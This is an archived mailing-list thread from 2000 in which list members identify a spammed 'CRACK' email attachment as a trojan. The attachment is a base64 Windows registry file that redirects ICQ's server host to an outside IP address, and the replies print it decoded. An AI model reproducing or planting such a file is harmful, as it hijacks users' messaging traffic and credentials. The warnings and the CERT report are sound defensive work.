From owner-freebsd-jobs Wed May 24 14: 4:19 2000 Delivered-To: freebsd-jobs@freebsd.org Received: from demos.su (mx.demos.su [194.87.0.32]) by hub.freebsd.org (Postfix) with ESMTP id EC47637BD6F for ; Wed, 24 May 2000 14:04:12 -0700 (PDT) (envelope-from ppbsereb%geisteskrank.demos.su@sinbin.demos.su) Received: from sinbin.demos.su ([194.87.5.31] verified) by demos.su (CommuniGate Pro SMTP 3.2.4) with SMTP id 6364870 for jobs@freebsd.org; Thu, 25 May 2000 01:04:10 +0400 Received: from geisteskrank.demos.su by sinbin.demos.su with ESMTP id BAA44176; (8.6.12/D) Thu, 25 May 2000 01:03:03 +0400 Received: from rcomputer by geisteskrank.demos.su with SMTP id BAA61511; (8.9.3/D) Thu, 25 May 2000 01:02:32 +0400 (MSD) Message-Id: <200005242102.BAA61511@geisteskrank.demos.su> From: "zulti@hotmail.com" To: Subject: CRACK Date: Thu, 25 May 2000 01:01:38 Московское время (лето) MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_01F6_01BF2E09.23F97E80" X-Priority: 1 X-MSMail-Priority: High X-Mailer: 'WE' Group Spamer Sender: owner-freebsd-jobs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_01F6_01BF2E09.23F97E80 Content-Type: application/octet-stream; name="crack.reg" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="crack.reg" UkVHRURJVDQNCltIS0VZX0NVUlJFTlRfVVNFUlxTb2Z0d2FyZVxNaXJhYmlsaXNcSUNRXERlZmF1 bHRQcmVmc10NCiJEZWZhdWx0IFNlcnZlciBQb3J0Ij1kd29yZDowMDAwMTQ0Ng0KIkRlZmF1bHQg U2VydmVyIEhvc3QiPSIxOTUuMTMzLjEwLjIzNCINCg== ------=_NextPart_000_01F6_01BF2E09.23F97E80-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-jobs" in the body of the message From owner-freebsd-jobs Wed May 24 14:10:49 2000 Delivered-To: freebsd-jobs@freebsd.org Received: from mail.mdanderson.org (mail.mdacc.tmc.edu [143.111.87.47]) by hub.freebsd.org (Postfix) with ESMTP id AC6F137BDA1 for ; Wed, 24 May 2000 14:10:45 -0700 (PDT) (envelope-from fosburgh@flash.net) Received: from jefnt (jef-nt.mdacc.tmc.edu [143.111.64.202]) by mail.mdanderson.org (8.9.1b+Sun/8.9.1) with SMTP id QAA03225; Wed, 24 May 2000 16:07:25 -0500 (CDT) Message-ID: <027201bfc5c4$826bd4b0$ca406f8f@mdacc.tmc.edu> From: "Jonathan Fosburgh" To: , References: <200005242102.BAA61511@geisteskrank.demos.su> Subject: Re: CRACK Date: Wed, 24 May 2000 16:10:37 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6600 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 Sender: owner-freebsd-jobs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ----- Original Message ----- From: To: Sent: Wednesday, May 24, 2000 8:01 PM Subject: CRACK Why is someone sending a Windows registry entry to the list? If you are reading this on Windows, do not open the attachment. If you have already done so, delete the entry in HKEY_CURRENT_USER\Software\Mirabgilis\ICQ\DefaultPrefs. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-jobs" in the body of the message From owner-freebsd-jobs Wed May 24 17:25:33 2000 Delivered-To: freebsd-jobs@freebsd.org Received: from alpha.globalreaction.com (alpha.thinkhost.com [208.231.1.78]) by hub.freebsd.org (Postfix) with ESMTP id 444D837B52E for ; Wed, 24 May 2000 17:25:30 -0700 (PDT) (envelope-from vladislav@davidzon.com) Received: from voyager (dsl-64-34-31-77.telocity.com [64.34.31.77]) by alpha.globalreaction.com (8.9.3/8.9.3) with SMTP id TAA64379 for ; Wed, 24 May 2000 19:30:43 -0400 (EDT) (envelope-from vladislav@davidzon.com) From: "Vladislav S. Davidzon" To: Subject: RE: CRACK Date: Wed, 24 May 2000 20:20:18 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal In-Reply-To: <027201bfc5c4$826bd4b0$ca406f8f@mdacc.tmc.edu> X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Sender: owner-freebsd-jobs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Looks like a trojan horse to me... I've reported it to CERT. REGEDIT4 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\DefaultPrefs] "Default Server Port"=dword:00001446 "Default Server Host"="195.133.10.234" -----Original Message----- From: owner-freebsd-jobs@FreeBSD.ORG [mailto:owner-freebsd-jobs@FreeBSD.ORG]On Behalf Of Jonathan Fosburgh Sent: Wednesday, May 24, 2000 5:11 PM To: zulti@hotmail.com; jobs@FreeBSD.ORG Subject: Re: CRACK ----- Original Message ----- From: To: Sent: Wednesday, May 24, 2000 8:01 PM Subject: CRACK Why is someone sending a Windows registry entry to the list? If you are reading this on Windows, do not open the attachment. If you have already done so, delete the entry in HKEY_CURRENT_USER\Software\Mirabgilis\ICQ\DefaultPrefs. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-jobs" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-jobs" in the body of the message From owner-freebsd-jobs Wed May 24 18:13:17 2000 Delivered-To: freebsd-jobs@freebsd.org Received: from ogopogo.flash.net (ogopogo.flash.net [209.30.2.14]) by hub.freebsd.org (Postfix) with ESMTP id 7FF5137B583 for ; Wed, 24 May 2000 18:13:13 -0700 (PDT) (envelope-from wotan@fosburgh.org) Received: from gw.fosburgh.org (p29.amax36.dialup.hou1.flash.net [209.30.72.29]) by ogopogo.flash.net (8.9.3/Pro-8.9.3) with ESMTP id UAA29689; Wed, 24 May 2000 20:13:06 -0500 (CDT) Received: from localhost (wotan@localhost) by gw.fosburgh.org (8.9.3/8.9.3) with ESMTP id UAA71665; Wed, 24 May 2000 20:13:06 -0500 (CDT) (envelope-from wotan@ns.fosburgh.org) Date: Wed, 24 May 2000 20:12:12 -0500 (CDT) From: Jonathan E Fosburgh Reply-To: fosburgh@flash.net To: "Vladislav S. Davidzon" Cc: jobs@FreeBSD.ORG Subject: RE: CRACK In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-jobs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 24 May 2000, Vladislav S. Davidzon wrote: > Looks like a trojan horse to me... I've reported it to CERT. > > > REGEDIT4 > [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\DefaultPrefs] > "Default Server Port"=dword:00001446 > "Default Server Host"="195.133.10.234" > > -----Original Message----- > From: owner-freebsd-jobs@FreeBSD.ORG > [mailto:owner-freebsd-jobs@FreeBSD.ORG]On Behalf Of Jonathan Fosburgh > Sent: Wednesday, May 24, 2000 5:11 PM > To: zulti@hotmail.com; jobs@FreeBSD.ORG > Subject: Re: CRACK > > > ----- Original Message ----- > From: > To: > Sent: Wednesday, May 24, 2000 8:01 PM > Subject: CRACK > > Why is someone sending a Windows registry entry to the list? If you are > reading this on Windows, do not open the attachment. If you have already > done so, delete the entry in > HKEY_CURRENT_USER\Software\Mirabgilis\ICQ\DefaultPrefs. > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-jobs" in the body of the message > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-jobs" in the body of the message > > I wonder what it does if you use Mirabilis ICQ. That IP traces to a dial-up in Russia. Jonathan Fosburgh Open Systems MD Anderson Cancer Center Houston, TX Home Page: http://www.fosburgh.org Manager, FreeBSD Webring: http://www.fosburgh.org/computer/freebsdring.html ICQ: 32742908 AIM: Namthorien To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-jobs" in the body of the message From owner-freebsd-jobs Wed May 24 18:32:50 2000 Delivered-To: freebsd-jobs@freebsd.org Received: from relay.ultimanet.com (relay.ultimanet.com [205.179.129.1]) by hub.freebsd.org (Postfix) with ESMTP id ACED237B583 for ; Wed, 24 May 2000 18:32:47 -0700 (PDT) (envelope-from randy@Cloudfactory.ORG) Received: from Cloudfactory.ORG (cloudfactory.org [205.179.129.18]) by relay.ultimanet.com (8.9.3/8.9.3) with ESMTP id TAA05347 for ; Wed, 24 May 2000 19:26:55 -0700 Message-Id: <200005250226.TAA05347@relay.ultimanet.com> To: jobs@FreeBSD.ORG Subject: Re: CRACK In-Reply-To: Message from Jonathan E Fosburgh of "Wed, 24 May 2000 20:12:12 CDT." Date: Wed, 24 May 2000 18:33:50 -0700 From: Randy Primeaux Sender: owner-freebsd-jobs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org http://blacksun.box.sk/icq.html Jonathan E Fosburgh writes: > > REGEDIT4 > > [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\DefaultPrefs] > > "Default Server Port"=dword:00001446 > > "Default Server Host"="195.133.10.234" > > I wonder what it does if you use Mirabilis ICQ. That IP traces to a dial-up > in Russia. -- Randy Primeaux randy@cloudfactory.org http://cloudfactory.org/~randy/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-jobs" in the body of the message